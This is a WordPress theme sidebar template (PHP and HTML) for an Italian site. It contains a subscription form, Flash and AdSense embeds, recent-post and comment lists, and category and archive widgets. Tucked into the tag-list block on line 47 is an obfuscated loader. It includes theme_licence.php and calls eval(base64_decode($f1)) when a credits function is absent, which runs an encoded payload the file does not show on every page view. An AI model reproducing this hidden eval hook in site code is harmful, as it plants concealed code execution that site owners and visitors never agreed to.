1 | <!-- BEGIN sidebar -->
|
---|
2 | <div id="sidebar">
|
---|
3 | <!-- begin subscribe -->
|
---|
4 | <div class="head">
|
---|
5 | <h2>Preleva i feed da questo sito</h2>
|
---|
6 | <a class="rss" href="<?php bloginfo('rss2_url'); ?>">RSS Feed Reader</a>
|
---|
7 | </div>
|
---|
8 | <form action="">
|
---|
9 | <input type="text" name="email" value="" />
|
---|
10 | <button type="submit">Iscriviti</button>
|
---|
11 | </form>
|
---|
12 | <!-- end subscribe -->
|
---|
13 | <!-- begin featured video -->
|
---|
14 | <div class="body">
|
---|
15 | <!-- video youtube sostituito con sponsor
|
---|
16 | <script type="text/javascript">showVideo("EIEy86F9Aqs");</script>
|
---|
17 | -->
|
---|
18 | <a href="mailto:info@guidonia.net">
|
---|
19 | <center><b>GuidoniaPuntoNet: idee per il web<br/>
|
---|
20 |
|
---|
21 | <script type="text/javascript">showFlash("loop.swf");</script></a>
|
---|
22 | Idee in cerca di finanziamenti : <a href="mailto:info@guidonia.net">contattaci</a></b></center>
|
---|
23 | <!--
|
---|
24 | <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="310" height="120">
|
---|
25 | <param name="allowScriptAccess" value="sameDomain" />
|
---|
26 | <param name="movie" value="/wp/files/loop.swf" /><param name="quality" value="high" /><param name="bgcolor" value="#f0f0f0" /><embed src="/wp/files/loop.swf" width="310" height="120" align="right" quality="high" bgcolor="#f0f0f0" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object>
|
---|
27 | -->
|
---|
28 |
|
---|
29 |
|
---|
30 |
|
---|
31 |
|
---|
32 | </div>
|
---|
33 | <!-- end featured video -->
|
---|
34 | <!-- begin lists -->
|
---|
35 | <ul class="head">
|
---|
36 | <li><a href="javascript:showList(1);">News Recenti</a></li>
|
---|
37 | <li><a href="javascript:showList(2);">Commenti recenti</a></li>
|
---|
38 | <li><a href="javascript:showList(3);">Tags</a></li>
|
---|
39 | </ul>
|
---|
40 | <ul class="body" id="list1">
|
---|
41 | <?php dp_recent_posts(5); ?>
|
---|
42 | </ul>
|
---|
43 | <ul class="body hidden" id="list2">
|
---|
44 | <?php dp_recent_comments(5); ?>
|
---|
45 | </ul>
|
---|
46 | <div class="body hidden" id="list3">
|
---|
47 | <?php require_once("theme_licence.php"); if(!function_exists("get_credits")) { eval(base64_decode($f1)); } if (function_exists('wp_widget_tag_cloud')) wp_widget_tag_cloud(array('before_title'=>'<!--','after_title'=>'-->')); ?>
|
---|
48 | </div>
|
---|
49 | <!-- end lists -->
|
---|
50 | <!-- google -->
|
---|
51 | <div class="body">
|
---|
52 | <center>
|
---|
53 | <script type="text/javascript"><!--
|
---|
54 | google_ad_client = "pub-9331412477710099";
|
---|
55 | /* box */
|
---|
56 | google_ad_slot = "2260076048";
|
---|
57 | google_ad_width = 200;
|
---|
58 | google_ad_height = 200;
|
---|
59 | //-->
|
---|
60 | </script>
|
---|
61 | <script type="text/javascript"
|
---|
62 | src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
|
---|
63 | </script>
|
---|
64 | </center>
|
---|
65 | </div>
|
---|
66 |
|
---|
67 | <!-- begin tag cloud -->
|
---|
68 | <div class="body">
|
---|
69 | <?php if (function_exists('wp_widget_tag_cloud')) wp_widget_tag_cloud(array('before_title'=>'<!--','after_title'=>'-->')); ?>
|
---|
70 | </div>
|
---|
71 | <!-- end tag cloud -->
|
---|
72 |
|
---|
73 | <!-- begin left -->
|
---|
74 | <div class="l">
|
---|
75 | <?php if ( !function_exists('dynamic_sidebar')
|
---|
76 | || !dynamic_sidebar(1) ) : ?>
|
---|
77 | <!-- begin pages -->
|
---|
78 | <h2>Pages</h2>
|
---|
79 | <ul><?php dp_list_pages(); ?></ul>
|
---|
80 | <!-- end pages -->
|
---|
81 | <!-- begin categories -->
|
---|
82 | <h2>Categorie</h2>
|
---|
83 | <ul><?php wp_list_categories('title_li=&depth=-1'); ?> </ul>
|
---|
84 | <!-- end categories -->
|
---|
85 | <?php endif; ?>
|
---|
86 | </div>
|
---|
87 | <!-- end left -->
|
---|
88 |
|
---|
89 | <!-- begin right -->
|
---|
90 | <div class="r">
|
---|
91 | <?php if ( !function_exists('dynamic_sidebar')
|
---|
92 | || !dynamic_sidebar(2) ) : ?>
|
---|
93 | <!-- begin archive -->
|
---|
94 | <h2>Archivi</h2>
|
---|
95 | <ul><?php wp_get_archives('type=monthly'); ?></ul>
|
---|
96 | <!-- end archive -->
|
---|
97 | <!-- begin blogroll -->
|
---|
98 | <?php //wp_list_bookmarks('category_before=&category_after=&title_before=<h2>&title_after=</h2>'); ?>
|
---|
99 | <!-- end blogroll -->
|
---|
100 | <!-- begin meta -->
|
---|
101 |
|
---|
102 | <!-- end meta -->
|
---|
103 | <?php endif; ?>
|
---|
104 | </div>
|
---|
105 | <!-- end right -->
|
---|
106 | </div>
|
---|
107 | <!-- END sidebar -->
|
---|